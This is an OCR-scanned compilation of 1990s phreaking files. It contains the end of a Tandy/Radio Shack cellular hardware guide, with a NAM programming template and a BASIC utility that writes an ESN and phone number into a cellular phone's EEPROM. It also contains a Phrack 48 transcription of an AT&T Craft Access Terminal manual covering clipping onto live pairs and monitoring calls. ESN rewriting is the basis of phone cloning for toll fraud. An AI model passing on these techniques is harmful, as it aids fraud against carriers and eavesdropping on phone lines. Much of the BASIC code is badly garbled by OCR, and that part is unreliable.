the transceiver through an attenuator, enter command SEL, 1, 2, SND, 
END to turn on the transmitter at high power. VR814 should then 

be adjusted to show 3 watts (34.8 dBm) on the power meter. 


6) Using the same power meter, enter command SEL, 1, 3, 7, END. 


Adjust VR846 for a low power maximum reading of 4 milliwatts (6 
dBm). 


7) Using a frequency counter to measure the output of the 
antenna connector, adjust X600 for a reading of 836.4000 MHz (q 0.1 kHz). 


8) Using a deviation meter, activate DTMF tones with command 
SEL, 2, 1, END, 1, 1, END and adjust VR259 for 8.4 kHz q 0.1 kHz DTMF 
deviation. 


9) End DIMF signaling with command 1, 0, END. Enable SAT 
transmission by entering SEL, 2, 8, SND, END and adjust VR261 for 
7.8 kHz deviation (q 0.1 kHz). 


10) Enter SND, END to discontinue SAT signaling. 


ADDITIONAL ADJUSTMEN 


The level of audio fed to the earphone via the "ear" line (pin #7 
on the handset connector) can be adjusted via VR215. 1.2 Vrms is 
the factory specified level with the volume turned up to it’s 
maximum setting. 


Received audio signals can be adjusted for minimal distortion by 
peaking L703. 


Frequency deviation of voice audio can be fine tuned with VR260. 
Factory spec. is for 8 kHz deviation. 


POWER LOSS 


If the transceiver refuses to even power up and begin self-diagnostics, 
check the traces on the underside of the board near the power connector. 


Most of these units ’protect’ themselves against reverse polarity 
being present on the power cables with fusible traces. If the 
phone is connected to a vehicle or battery power supply backwards, 
one of these very small circuit traces will vaporize, leaving the 
phone inoperativ 


While inconvenient for the customer and service technician alike, 
repairing the trace is an additional source of revenue for the 

shop that might not be generated had a standard replaceable fuse or 
rectifier been utilized in the design. 


APPENDIX III 


TECHNICAL RESOURCE 


wn 
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In preparing this article and performing other research involving various 
types of firmware, we used the EPROM+ programming system from Andromeda 
Research. This small, portable device is housed in a carrying case and 
requires no internal card to operate with your PC. Once the software is 
installed on the computer, the EPROM+ programmer is simply plugged into an 
available parallel printer port. 


To program the PCD8572 series EEPROMs, a small adapter is required. 


You can construct this yourself from the included instructions, 
or purchase it already built for about $35 extra. 


The EPROM+ programming system is available for $289 from the 
manufacturer: 


Andromeda Research 
P.O. Box 222 

Milford, Ohio 45150 
(513) 831-9708 voic 
(513) 831-7562 - fax 


SERVICE MANUALS 


Service manuals are available for most Radio Shack or Tandy products from 
Tandy National Parts. Ordering these publications requires that you visit 
your local Radio Shack store. Tell the clerk that you want him (or her) 
to call National Parts and order a service manual for catalog number.... 


National Parts no longer accepts calls from consumers and will only 
ship to a recognized Radio Shack retail outlet. 


NOKIA -— MOBIRA 
Service handsets, manuals and other parts can be ordered from 


Nokia-Mobira in Largo, Florida. Their toll-free technical 
assistance number is (800) 666-5553. 


[J 


TANDY FAX-BACK SERVIC 


Tandy Support Services offers technical information via fax-back 

server. There is no mention that the service is restricted to 

Radio Shack stores. Although ANI can be hell, the toll-fr number 

is (800) 323-6586 if you want to be faxed product info on assorted ’Shack 
products. The server makes neat video game noises, and thanks you for 
using the service. 


For an index of the cellular specification sheets available via 
fax-back, request document #8882. 


Programming instructions are also available from this automated 
fax server: 


DOCUMENT # PHONE MODEL 

9009 Current List [index] 

8728 CT-105, 1050, 1055 

9004 CT-350 

9005 CT-302 

9006 CT-102;, 103, 104, 1030, 1033 
9007 CT-300, 301 

9008 CT-100, 101, 200, 201 

9020 CT-351 

9665 BC901ST [170-1015] 
9579 CP-1700 [170-1016] 


9577 CP-4600/5600 [170-1067 / 170-1056] 
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14493 Ericsson AH-210 [170-1064] 
9581 EZ-400 [170-1057] 
9743 Motorola 12822 [170-1058] 
9583 Motorola DPC550 [170-1059] 
This information provided for reference purposes only. Use of 


this fax-back service may be restricted to authorized personnel. No 
one has ever faxed me to complain, however. 


THE INTERFACE 


The uuencoded drawing which accompanies this article describes th 

interface required to use the programming software to rebuild the data 
stored within the serial EEPROM. Because there are a number of variables 
that can affect the performance of this software and interface, prepar 
yourself for a bit of trial and error. A standard programming device is 
recommended over the use of this software. Since the original publication 
of this manual in hard-copy, we’ve heard reports that the software does not 
work well with the PCD8572, but does favor the PCD85C72 (CMOS version). 


The DB-25 connector is wired to an 8-pin DIP socket to accommodate the 8572 
integrated circuit. A regulated, well-filtered source of 5 volts must be 
connected to pin #8 of the DIP socket, and Pin #4 must be tied to ground. 

If the PC used for programming and the power source to the IC socket share 

a common ground, you may be able to use pin #25 of the parallel port connector 
as shown in the diagram. 


Please be careful not to cause any shorts in this instance or you 
may damage your computer by sinking too much current through the 


parallel port. If you are unsure of what you are doing, eliminate 
the connection between pin #4 of the IC socket and pin #25 of the 
DB-25 connector. Instead, connect pin #4 directly to ground. 


The resistor shown in the circuit is used as an optional voltage 
divider. Depending on the voltage provided by pin #2 of your 
parallel port, a resistor between 100 and 1k ohms may be required 
to drop it to a level within the nominal range required by the 
EEPROM. 


h 


[7] 


TUNING THE RADIO 


The diagrams in the uuencoded .zip file will assist in identifying and 
locating the various adjustment points on the logic board and transceiver (RF) 
PC board. Alignment should not be attempted by technicians unfamiliar with 
the principles involved, or in the absence of calibrated radio frequency 
measurement equipment. 


A diagnostic (service) handset may be required to access 
service-level commands within the transceiver. If the phone does 
not respond properly to the commands documented herein, you’1ll 
need to obtain a service handset from Tandy National Parts. This 
handset is actually a Nokia "programming handset" which can be 
obtained directly from the factory. 


PROGRAMMING TEMPLATE 


For Tandy / Radio Shack Cellular Mobile Telephones 
Models CTI-102, 302, 1030, 1033, etc. 


1) Power up phone. After the phone cycles through it’s 
self-test mode and the display clears, enter the following keystrokes from 
the keypad: 


Re 3, 0, 0, 1, #, X, X, X, X, X, SEL, 9, END 


The X, X, X, X, X represents the five-digit security code stored 
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in EEPROM. The factory default is 1, 2, 3, 4, 5. This security 
code is required to access handset programming mode. 


2) The display will now read: IdEnt IF InFO Pri 


3) Press END to program NAM 1. Display will show first 
programming step. 


4) To program NAM 2, press SND twice instead of END. Display 
will cycle through: OPt InFO diSAbLEd then OPt InFO EnAbLEd 


5) Use the END key to step through each step. The SND key 

toggles the state of single-digit options. To enter new 

information, use END to step through the display until the old 

data is displayed. Key in the new data and press END to increment to 
the next step. 


6) When programming has been completed, press SEL, CLR to save 
changes. 

Step # Desired Input Display Data Description 

Ol 5 digits HO-Id SIDH (Home System Identification) 
02 0 or 1 MIN Mark MIN Mark (Toggle with SND) 

03 Cer “2 LOCL OPt Local Use Mark (Toggle with SND) 
04 10 digits Phon MIN (Area Code + Mobile Number) 
05 08 St CLASS SCM (Station Class Mark) 

06 333 or 334 PAging Ch IPCH (Initial Paging Channel) 

O07 2 digits O-LOAd CL Access Overload Class 

08 A or B PrEF SyS Preferred System (Toggle with SND) 
09 2 digits grOUP Id GIM Mark (Set to 10 in U.S.) 

10 5 digits SECUrity Security Code 

Pe 0, CSS 1 dAtE Firmware Date - not changeable 

12 mmddyy 2 dAtE Installation Date 


Press SEL, CLR to save & exit. Turn Power off and back on for 
model CT-302. 


[Begin Editorial] 


HOW TO OBTAIN A HARD-COPY VERSION OF THIS FILE - WITH ALL PHOTOS: 


"The Complete Guide to Tandy / Radio Shack Cellular Hardware" is available 
for $15 prepaid. We keep $5 of the price to cover the cost of printing 

and the Priority mail postage. The remaining $10 of the purchase price will 
be donated to Boston’s The LOpht to help them cover the cost of upgrading 
their Internet connection for l0Opht.com.... 


The guys at the LOpht have always been cool with us, and maintain what 
amounts to one of the best cellular archives accessible on the ’net. We 
want to do what we can to assist them in providing this public source of 
enlightenment. Now you can help them, and get something for it in return. 
If nothing else, you can sit back and enjoy all my great close-up photos 
of the chips <g>! 


-—- Damien Thorn 


Here’s the address: 


Phoenix Rising Communications 
3422 W. Hammer Lane, Suite C-110 
Stockton, California 95219 


[end editorial] 
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You can reach me via e-mail at: damien@prcomm.com 


1000 ’ CELLULAR DATA REPAIR UTILITY 
1005 ’ Form image and program PCD8572 IC via LPT port. 
1010 ’ (c) 1993, 1994, 1995 WarpCoreBreachGroup - All rights reserved. 


1020 ’ This program is not shareware/freewar 


1030 DATA xx,XxX,XX,XX,XX,XX,XxX,xXxX ' Bytes 00-07 
1040 DATA xx,38,xxX,xXxX,XX,XX,XxX,xXxX ' Bytes 08-15 
1050 DATA 00,00,00,00,xx,xx,xx,xx '’ Bytes 16-23 
1060 DATA xx,XX,XX,XX,XX,XX,XxX,xXxX ' Bytes 24-31 
1070 DATA xx,xx,xx,D6,C5,5C,C6,00 ’ Bytes 32-39 
1080 DATA 27,00,01,01,11,11,11,11 ’ Bytes 40-47 
1090 DATA 11,08,4D,01,0F,01,0F,00 ’ Bytes 48-55 
1100 DATA 04,00,00,00,FF ’ Bytes 56-60 
1105 UNIT1$="050490" 

110 DIM BYTES (60) ,BYT! 


1 FE (61) 

1120 FOR I=0 TO 60:READ BYTES (I) :NEXT 

1130 FILES "*.IMG" 

140 LINE INPUT "Which file do you want to read? ";FS$ 

150 OPEN "I",#1,FS+".IMG" 

160 INPUT#1,ESNPREFIX 

170 INPUT#1,ESN# 

180 INPUT#1,HOMEID 

190 INPUT#1,ACCESS 

200 INPUT#1,LOCALOPT 

210 INPUT#1,PHONES 

1220 INPUT#1,STATCLASS 

230 INPUT#1,PGCH 

240 INPUT#1,OVERLDCL 

250 INPUT#1,PREFSYS 

260 INPUT#1,GROUPID 

270 INPUT#1, SECS 

280 ’ Building binary image 

290 UNIT2S=MIDS (UNITS, 1,2) +MIDS (UNITS, 4, 2) +MIDS (UNITS, 9, 2) 
300 CLOSE #1 

310 FOR I=1 TO 5:BYTES (I-1)="3"+MIDS (SECS,1I,1) :NEXT 

1320 FOR I=0 TO 2:BYTES (10+1I)=RIGHTS ("O"+HEXS (VAL (MIDS (UNIT1$,1*2+1,2))),2) 
1325 NEXT 

330 FOR I=0 TO 2:BYTES (13+1) =RIGHTS ("0"+HEXS (VAL (MIDS (UNIT2$5,1*2+1,2))),2) 
335 NEX 

340 FOR I=0 TO 4:BYTES (24+1) =MIDS (PHONES, 2*1I+1,2) :NEXT 
350 FOR I=5 TO 0 STEP -1 

360 Q=INT (ESN#/ (16*T) ) 

370 ESN#=ESN#-Q* (16%T) 

380 IF Q>9 THEN Q=0+7 

390 ESNS=ESNS+CHRS (48+0Q) 

1400 NEX 

1410 BYTES (8) =RIGHTS ("0"+HEXS (ESNPREFIX) , 2) 

1420 BYTES (5) =MID$ (ESNS$, 5,2) 

1430 BYTES (6) =MID$ (ESNS, 3, 2) 

1440 BYTES (7) =MIDS$ (ESN$,1, 2) 

1450 FOR I=0 TO 60:QS=BYTES (T) 

1460 QH=ASC (LEFTS (Q$,1))-48:IF QH>9 THEN QH=QH-7:IF QH>15 THEN QH=QH-32 
1470 QL=ASC (RIGHTS (Q$,1))-48:IF QL>9 THEN QL=QL-7:IF QL>15 THEN QL=QL-32 
1480 Q=QH*16+OL 

1490 BYTE (I) =Q: CHECK=CHECK+Q 

1500 NEXT 

1510 BYTE(20)=HOMEID AND 255:BYTE(21)=INT (HOMEID/256) 

1520 BYTE (22) =ACCESS 

1530 BYTE (23) =LOCALOPT 

1540 BYTE (29) =STATCLASS 


200 
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BYTE (30) 
BYTE (32) 
BYTE (33) 
BYTE (34) 


15 


=PGCH AND 255:BYTE(31)=INT (PGCH/256) 


=OVERLDCL 
EFSYS 


=GROUPID 


ACS=MIDS (PHONES, 1 


PRES=MIDS$ (P 


HON! 


ES, 


PHS=MIDS$ (PHONES, 7 
AC=VAL (ACS) 


IF 
EE 
IF 
AC2 


M 
uM 
M 


DS (AC$,2,2)="00" 
D$ (AC$,3,1)="0" 
D$(AC$,2,1)="0" 


ES) 


IF 
IF 
IF 
PRE 


ali 


E$,2,2)="00" T 
ES,2,1)="0" 
ES,3, 1)="0" 


13) 
4,3) 
74) 


T 
[HI 
CHI 


HI 


N 
N 


ay 
any 


EN AC2=AC-1:GOTO 


1670 
1670 
1670 


AC2=AC-101:GOTO 
AC2=AC-11:GOTO 


RE2=PRE-1:GOTO 1720 


THE 


PRE2=PRE-11:GOTO 1720 


THE 


PRE2=PRE-101:GOTO 1720 


I 
I 
i 
A 
PRE=VAL ( 
I 
I 
I 
R 


2 AN 


(35) 


THEN PR 


E2=1000+ 


H$,1)=" 
ASC (PHS) 
HS, Ajo) = 
HS, 3,1) = 
H$,2,1) 
HS, Dep) = 
HS) -D 
E2/4) 

E2 AND 3) 
D255 


uvUdUuduttydAA oO] Uy 


=A 


—49) 


O" THEN 


wot 
wo 
wos 
wo 


ow Gi 


OR INT (PH2/256) 


=AC2 AND 255 
=INT (AC2/256) 


60 


HI 
";ADD 


bas 


K+BYTE (1) 


ECK AND 255 
RS="000" 


h 
78! 


FO 


DOU 


URN 
R I=1 TO 
B=ASC (MIDS (BS, I,1))—-48 
UB 1970 
UB 1970 
UB 1970 


UT 
UT 


P ( 


T=B:C 


EX 


T=1:C 


DIN=0 


BASE) AND 


EN (BS 


LK=0:GOS 
LK=1:GOS 
LK=0:GOS 


LK=1:GOS 
THEN RE 


’ Is voltage app 


T=T4 


[T=200 


t+1:GO 


THEN B 


= 


TO 2080 
ELAY=1: 


MAX 
K=1:GOS 
THEN BE 
LK=1:GOS 
LK=0:GOS 
DDR$+"0" 


] DOUT AND 1) 
ELAY=0 TO 9:NEXT 


UB 
EP : 
UB 
UB 


address for your printer port with the next line. 


Which is LPT2. &h378 is LPT1 and &h3bc is LPT3. 


1 


a 


) 


UB 1970 
TURN 

EP :PRINT 
lied to the chip? 


E$ GOTO 2140 


1970 ’ 
PRINT 
1970 
1970 


OR 2* (CLK AND 1) 


PRE2 
D=-24:GOTO 1750 


OR 4* (RELAY) 


"Nack timeout error":STOP 


DOUT=1:CLK=1:GOSUB 1970 


Start bit 
"Bus not free error":STOP 


, 


Bad! 


7.txt Wed Apr 26 09:43:41 2017 16 


2210 GOSUB 2010 

2220 BS="" 

2230 FOR I=7 TO 0 STEP -1 

2240 IF (J AND (2%1)) THEN BS=BS+"1" ELSE BS=BS+"0" 
2250 NEXT 

2260 GOSUB 2010 

2270 Z=BYTE (J) 


2280 BS="":FOR I=7 TO 0 STEP -1 
2290 IF (Z AND (2%1I)) THEN BS=BS+"1" ELSE BS=BS+"0" 
2300 NEX 


2310 GOSUB 2010 

2320 DOUT=0:CLK=0:GOSUB 1970 

2330 DOUT=0:CLK=1:GOSUB 1970 ’ Stop bit 

2340 DOUT=1:CLK=1:GOSUB 1970 

2350 PRINT USING "###%3 programmed"; 100*J/MAX 
2360 PRINT STRINGS (80*J/MAX, 46) 

2370 LOCATE CSRLIN-2, POS (0) 

2380 GOSUB 1970 


2390 IF DIN=0 GOTO 2380 

2400 NEXT 

2410 RELAY=0:DOUT=1:CLK=1:GOSUB 1970 
2420 PRINT:PRINT 


2430 ’This is the end in case you though the code was truncated somehow... 
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==Phrack Magazine== 


Volume Seven, Issue Forty-Eight, File 8 of 18 


Written by Boss Hogg 


Greets: Voyager/Splatter/Mr.Hyde/Misfit/Darkseed/] [avok/Paradyne 
Ethereal Gloom/Surgat/GOL/Carnage/Kamakize/Seeker/Stravis 
+ all others with weird thoughts and ideas. 


The craft. 


Although its called a Craft Access Terminal, the craft hardly 
represents a standard computer terminal. It is in actually a lineman’s 
handset with a built in terminal and 1200 baud modem. The unit looks 
like a handset on steroids measuring 12.5" in length. The ones in our 
particular area were bright yellow and looks like a rejected Sesam 
Street prop. We have reports that they also made them in a blue color as 
well though we have yet to see one in use in our area. 


The unit features a 4 line x 16 character LCD display, anda 
joystick with a plunger on the top. You will find a diagram of the unit 
with descriptions in brackets. 


These units are possibly being phased out in a few areas and 
have been found at telco auctions as well as from surplus stores. They 
could be replacing these yellow units with the blue units (Which have 
the same basic descriptions yet are newer. The crafts we have found were 
severely worn). We have also heard they were being replaced with a 
Access-2 terminal (rumored to represent a HP-951x palmtop; Fold open, 
larger LCD screen). 


This is essentially the entire uncopywritten manual to the 
terminal. The unit can be somewhat confusing at first due to a somewhat 
weird menu layout. 


Also, to avoid confusion: 


The page numbers are located at the bottom of the pages. You may wish 
to add pagefeeds and space out the page numbers to the bottom of the 
page if you want to print it out and stick it in your phreakers binder 
or whatever.... The line is meant for the top of each page... As there 
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is a line at the top in the real manual. 


—---Here begins the Craft Access Terminal Instruction Manual----— 


AT&T 


Craft Access Terminal 


Instruction Manual 


—cover- 
Table of Contents 
Page 
Features 2 
Using the pointer = 4 
Battery Pack : 6 
Connecting to a working pair : 8 
Making a telephone call 29 
Calling a computer ody 
Working with a computer 3-15 
Getting help 1S 
Making or canceling a 
selection on a screen 217 
Reading stored information 2 iLg 
Filling in information 2-20 
Taking care of your terminal : 25 


Getting Started 


Two battery packs, a charger and a short charger adaptor cord 
should be in the box with the Craft Access Terminal. Before 
using the Craft Access Terminal, insert a battery pack. The 
battery pack must be charged before use. For directions on how 
to charge and insert the battery pack, look at the section of 
the instructions called "The Craft Access Terminal’s Battery 
Pack." This section begins on page 6. 
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Craft Access Terminal Features 


Receiver -— Works like any ordinary telephone receiver. 
points to ear-piece] 


Transmitter - Works like an ordinary telephone transmitter. 
points to mouthpiece] 


Craft Access Terminal —- Identification Number 
points to sticker underneath the TRANSMITTER] 


Phone Jack — A modular telephone cord can be plugged in here. 
located on bottom of the handset] 


Recharger Jack - The plug on the recharger cord is inserted into 
the jack. 
[located on bottom of the handset] 


Connecting Cord - Connects to a working pair to get dial tone for 
making a call to either a telephone or a computer. 
[extends from bottom of handset] 


(ee fees pees fetes lene 


Screen - A liquid crystal display shows information 
or instructions. 
fon top-front of handset. c’mon- you cant miss it!] 


Mode Switch 
Three positions: 


Talk -make a phone call 
Monitor -listen for conversation 
Data -make a computer call 


Moving the switch to monitor will disconnect a call. 
[This switch is located on the right-top side, when the ] 
[LCD screen is facing you ] 


Pointer -—- Used to mark and select actions on the screen and to 
indicate where you want to enter information. 
[Joystick located under Screen] 


Rechargeable Battery Pack - Provides power for the terminal. The 
pack must be recharged every day. 


This is accessed by removing a cover held in place by a normal ] 
phillips screw. The compartment is located under the pointer. ] 
NOTE: Although there is a 9-volt battery snap, the thing only ] 
u ] 
WwW ] 


ses 4 1.2volt nicads... 4 AA batteries work fine... For those 
hose sets didn’t come with battery packs 


Alpha Numeric Keypad Used to enter letters and numbers on the 
screen. 
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[Uhh- A normal Touch Tone pad... Cant miss it ] 


Using the pointer 


B BACK 
A 

Cc < aS 

K < ae 

Ss < “oo 

Pi o< V 

Cc 

E REVIEW 
A.V 


Joystick 


VVVV 


The pointer allows you to make choices from a 
screen, show where you want to fill in information, 
read information that is temporarily stored for you 
in the Craft Access Terminal, and get an 
explanation about a screen. 


Hx<xF2 


Remember that you must push the pointer to 
make a choice. 


UZwNn 


The pointer can be moved along the right side, 
along the left side, to the top center and bottom 
center position. 


joystick direction 


If you want to select from two or more choices on the 
screen, move the Pointer along the right side until 
the arrow (>) appears next to the line you want to 
select and then press the Pointer. 


If you want additional information about one of the 
choices on the screen, move the Pointer along the 
left side until the question mark (?) appears next to 
the line where you need HELP and then press the 
Pointer. 


If you want to go BACK one screen, move the Pointer 
to the top center position and then press the 
Pointer. 


If you want to REVIEW information stored in your 
Craft Access Terminal, move the Pointer to the bottom 
center position and then press the Pointer. 


-5- 


8.txt 


Wed Apr 26 09:43:41 2017 5 


The Craft Access Terminal’s Battery Pack 


You must charge the terminals battery pack at least once every 
day. It may take up to twelve hours for a full charge if the 
battery pack has run down completely. Also, before the first 
use, each battery pack should be charged for 24 hours. 


To do this, insert the plug at the other end of the cord 
attached to the charger into the socket at the transmitter end 
of the Craft Access Terminal. Plug the charger at the end of 
the cord into an electrical outlet. The red light on the 
charger should be lit if it is charging properly. However, the 
light will not go out if the battery is fully charged. It is 
advisable to keep th xtra battery pack charged so you can 
use it if the battery pack in the terminal you’re using runs 
down. To charge the spare battery pack, plug the charger 
adapter cord, (the short cord included with the charger) into 
the pack. Plug the other end of the adapter cord into the 
charger, and plug the charger into an electrical outlet. 


CAUTION 


The charger should only be used indoors and only for charging 
Craft Access Terminal. 


In the battery pack runs out of power while you are using the 
terminal, the pack can be removed and the charged pack can be 
inserted. To do this, follow these steps: 


1. Open the Battery Pack Compartment 
Loosen the screw to open the battery cover. Do not hold 
down battery compartment cover while loosening the 
screw. 


2. Remove the Battery Pack 
Lift out battery pack. Unsnap the battery pack from the 
connector. 


-6- 


3. Insert the Battery Pack 
Snap the charged battery pack into the connector. 
Slide the battery pack into the Craft Access Terminal. 
Close the battery cover. Don’t forget to tighten 
the screw. 


How Long Will the Craft Access Terminal Stay Charged? 


At normal temperatures, the Craft Access Terminal will 
operate for approximately 12 hours after being charged. 


The Craft Access Terminal can be used in warm or cold 
temperatures. You should keep in mind however, that the 
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battery pack will be drained faster in cold weather. At -20 
degrees Fahrenheit, it may last only 8-10 hours. 


The battery pack in the Craft Access Terminal should no be 
charged at temperatures less than 40 degrees Fahrenheit. 


Battery Pack Life 


The battery pack can be charged many times, providing a 
working life of about 5 years. The four digit number stamped 
on the end of the battery is its date of manufacture. 


Connecting to a Working Pair 


Monitor the Line 
Before connecting to a pair, set the switch at the Monitor 
(center) position. 


Connect Cord and Clips 

Attach cord clips to tip and ring. If you hear a conversation, 
select another pair. You should hear dial tone when connected 
to an available working pair. 


* Connect at a standard terminal point whenever possible to avoid 
puncturing the insulation; holes made in insulation by clips 
can lead to later corrosion problems 


Alternately, dial tone can also be obtained by inserting a 
modular cord as shown on page 2. Do not insert line cord to 
modular jack and connect to tip and ring at the same time. It 
will not work. 


Move back to monitor to increase or decrease volume. To 
increase the volume, move the Pointer along the right side 
until the arrow (>) in next to "increase volume" and then 
press the Pointer. 


To decrease the volume, point to the third line, and press. 


If you want to use the terminal to listen for noise on the 
line, point to the second line and press. This puts the 
terminal in the "quiet" mode so that very low levels of noise 
can be detected. 


Notice that the top line on this screen can’t be selected. To 
indicate this, the first space on the line contains a bar. 
(I). 


You can now make an ordinary telephone call be moving the 
switch to Talk (see Making a Telephone Call) or calla 
computer by moving the switch to Data (see Calling a 
Computer). 
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Making a Telephone Call 


Move the switch from Monitor to Talk Position 


Monitor the line to be sure it isn’t in use. If no one is 
talking on the line, move the switch from Monitor to Talk. 


Telephone Number 


ntry and Correction 


ts 


If the line is good, you will hear a dial tone. You can enter 
the number you want to call through the keypad. If a number is 
already filled in, you can call that number, or, if you want 
to call a different number, erase the number that is on the 
screen by pressing * on the Touch-tone pad, and enter another 
number. 


* If the (*) is entered as the first character, it will not 
erase unless another (*) us entered. 


The small flashing bar is called the cursor. The cursor will 
appear where a number must be entered. 


As each digit to the telephone number is filled in, it will 
appear where the cursor was, and the cursor will move one 
space to the right. Enter a pound (#) between digits to 
indicate a 2-second pause in dialing where required (to wait 
for a second dial tone behind a PBX number, for example). For 
a longer pause, press pound (#) several times. 


When the correct phone number is shown, move the Pointer to the 
right side (anywhere along the right side will do) and press. 
If you need to rotary dial, select the last line with the 
Pointer before you press. The Craft Access Terminal will dial 
the number. You can re-dial by moving the Pointer to the right 
side and pressing again. 


The Craft Access Terminal will save the telephone number and it 
will appear the next time the switch is moved to the Talk 
position. 


You can listen as the Craft Access Terminal dials the number. 
If you hear a busy signal after dialing is completed, or if no 
one answers the call, disconnect by moving the switch to the 
Monitor position. 


Call in Progress and Volume Control 


When dialing is completed, this screen appears. Use the 
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Pointer the increase or decrease the volume of the receiver, 
or to mute the trans mitter to listen only. 


The volume level is indicated by the number of filled spaces on 
the increase volume line. One filled space for minimum volume, 
four for maximum. 


-10- 


Disconnecting 


Moving the switch to the Monitor position will end the phon 
call, and this screen will appear. 


Be sure to move the switch to the Monitor position after 
disconnecting. This will conserve battery power as the 
terminal drains the least amount of power in the monitor mode. 


If you are accidentally disconnected, move the switch to the 
Monitor position and start again. 


-11- 


Calling the Craft Access System Computer 


Move the Switch from Monitor to Data Position. 


Monitor the line to be sure it isn’t in use. If no one is 
talking on the line, move the switch from Monitor to Data. 


Telephone Number Entry and Correction 


You can enter the number you want to call through the keypad. 
If a number is already filled in, you can call that number, 
or, if you want to call a different number, erase the number 
on screen by pressing the asterisk (*) on the Touch-tone pad, 
and fill in another number. 


The cursor will appear where a number must be entered. 


Fill in the computer’s telephone number if it isn’t already 
shown. Put a pound (#) between digits to indicate a 2-second 
pause in dialing where required (to wait for a second dial 
tone behind a PBX number, for example). For a longer pause, 
press pound (#) several times. 


-12- 
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When the correct phone number is shown, move the Pointer to 
the right side (anywhere along the right side will do)and 
press. The Craft Access Terminal will dial the number. You 
can re-dial by moving the Pointer to the right side and 
pressing again. 


Indications that the Call is Successful 

If the call to the Craft Access System computer is successful, 
you will hear a tone on the line. When the Craft Access 
Terminal detects that tone, the tone will stop and a screen 
like this will appear. 


In some cases the call may not be successful. If you retry a 
few times and still have difficulty, try connecting your cord 
to another working pair. 


Password Entry 


Before you send or receive any computer information, you may 
need to fill in a numeric password to identify yourself anda 
number to identify your terminal. Your password can be used 
only with your Craft Access Terminal. Fill in your password 
on the keypad. If you make a mistake press the asterisk (*) 
to erase the password and start over. The cursor will return 
to the place where the password must be filled in. 


The Terminal Identification number is located below the 
transmitter (see page 2). 


When the correct numbers are filled in, move the Pointer to 
the right side (anywhere along the right side will do) and 
press. The Craft Access Terminal will send your password to 
the computer. 


-13- 


See "Working with the Craft Access System Computer" for further 
instructions about what to do next. 


Disconnect 


If your call to a computer is accidentally dis connected, move 
the switch to the Monitor position and repeat from the first 
step to re-dial. 
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If you want to disconnect, move the switch to Monitor and this 
screen will appear. 


-14- 


Working with the Craft Access System Computer 


Each line on a screen is either: 

— information 

—- a space in which information can be filled in 

- a choice that can be selected 
This screen is an example. Information can be read on the first 
line, a number is to be entered on the second line, and you 
can make a choice between the last two lines. Lines that don’t 


contain selectable choices begin with a bar (I). Those that 
are selectable choices begin with a blank space. 


Getting Help 


To get help about the third line of this screen, move the 
Pointer along the left side until a question mark appears 
beside the third line. When the question mark is beside the 
line, press the Pointer. The help that appears de scribes what 
will happen if you select choice 1. 


To get help about the second line of this screen, a line in 
which information can be filled in, move the Pointer along the 
left side until a question mark (?) appears in the space wher 
information is to be filled in and then press. 


-15- 


This is an example of an explanation. A bar (I) appears to the 
left of every line and there is a page number in the top right 
corner of the screen. This page is numbered 1/2, indicating 
that it is the first page of two pages of information. the 
second page will be numbered 2/2. 


To read the next page of Help, move the Pointer to the right 
side (anywhere along the right side will do) and press. 
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If you want to re-read pages, point to REVIEW (move the Pointer 
to the bottom center position and press) to go back one page 
at a time. 


When you are ready to go back to the screen where you 
originally requested help, point to BACK (move the Pointer to 
the top center and press). 


-16- 


Making or Canceling a Selection on a Screen 


Making a Selection 


When a screen that contains selectable choices is shown, move 
the Pointer along the right side until the arrow (>) is 
beside the choice you want. Then press the Pointer to make 
the selection. 


Some choices make requests of a computer that may take a while. 
If so, a “request in progress" message such as this will 
appear. 


-17- 


Canceling a Selection 


If at this point you realize that you’ve made a wrong choice, 
point to BACK (move the Pointer to the top center and press). 
The screen on which you made the choice will be shown and you 
can make a different choice. 


Some requests cannot be canceled. In this case, only "request 
in progress" is displayed. 


-18- 
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Reading Information Stored in the Craft Access Terminal 


Some of the information sent to you from the computer 
stored in the Craft Access Terminal in case you need 
later, even if your terminal is disconnected as long 
battery pack is charged. If you want to see stored 
information, move the switch to either Monitor or Voi 
point to REVIEW (move the Pointer to the bottom cente 
press). 


A list containing the major categories of information 
stored in your Craft Access Terminal will appear on t 
screen. To select a category, move the Pointer along 
Side until the arrow (>) is beside the category that 
to select and then press the Pointer. 


may be 
it again 
as its 


ce and 
r and 


currently 
he 

the right 
you want 


Sometimes an item that you have selected leads to another list. 


Make a selection from this list in the same way you d 


id on the 


previous list. To quit reading, point to BACK (move the 


Pointer to the top center and press). To reread pages 
stored information, point to REVIEW (move the Pointer 
bottom center position) and then press the Pointer. 


-19- 


of 
to the 


Filling in Information on the Craft Access Terminal 


If a screen contains a space where a number can be fill 
the cursor will be blinking at the space. If there is 


led in, 
already 


a number in the space you may want to change it. If you decide 


to use the number that is already shown, point to NEXT 


(move 


the Pointer to any position on the right side and press). 


If you want to change the number, press the asterisk (*) to 
erase the wrong number, then fill in the number you want. 


When the desired number is shown, point to NEXT (move the 


Pointer to any position on the right side and press). 


-20- 
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Sometimes you may need to return to a screen to correct an 
entry. 


When you point to BACK (move the Pointer to the top center and 
press), the cursor will appear at the beginning of the first 
place where information was filled in. 


Press the asterisk (*) on the keypad to erase th ntered 
number or make a correction by typing over the incorrect 
number with the correct number. 


-21- 


If there are several spaces to be filled in on one screen, move 
the Pointer along the right side of the control to point to 
each location where you can enter information. Don’t press the 
Pointer until you have filled in all the required information. 


If a space where information can be filled in is preceded with 
an asterisk (*), the information is optional and the space may 
be left without an entry. 


After you have filled in all of the information you need, point 
to NEXT (move the Pointer to any position on the right side 
and press). 


Display of the asterisk is actually controlled by the Craft 
Access System computer. Keep in mind that this can change. 


—-22- 
Sometimes the Craft Access System will allow you to enter the 
letters and punctuation marks to fill in the information that 
is needed. Whenever this is the case, this screen is 


displayed. 


ntering Alphabetical and Numeric Characters 


cal 


Letters, numbers and punctuation marks are entered from the 
keypad. All characters you enter appear on the screen. 


Each key is used to enter four different characters as labeled 
on the key; except for the [#] key. The [SP] on the [#] key is 
used to enter a space between two words. 


Two easy methods can be used to enter characters: 


—- Method 1: Press and hold down the key with the desired 
character. Look at the display while holding down the key. 
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You will see each character labeled on that key appear on 
after the other. When the desired character appears, release 
the key and that character will remain on the screen, and the 
cursor will advance to the next position. 


Method 2: There is no need to continuously watch the screen 
with this method. Instead of holding down the key you rapidly 
tap the key a number of times equal to the position of the 
desired character on that key. 


For example, tap the [6] key thr times to enter [N]; tap 
the [3] key thr times to enter [E]; tap the [9] key twice 
to enter [w] and tap the [#] key twice to enter a space. 


A blinking dark block on the screen indicates you have entered 


you last character. 


-23- 


po 
hr 


I 


Se 


asing a Character, an Entire Line or more. 


f you want to erase a character, push the pointer to the left 
and press once. Holding the pointer down it will continue to 
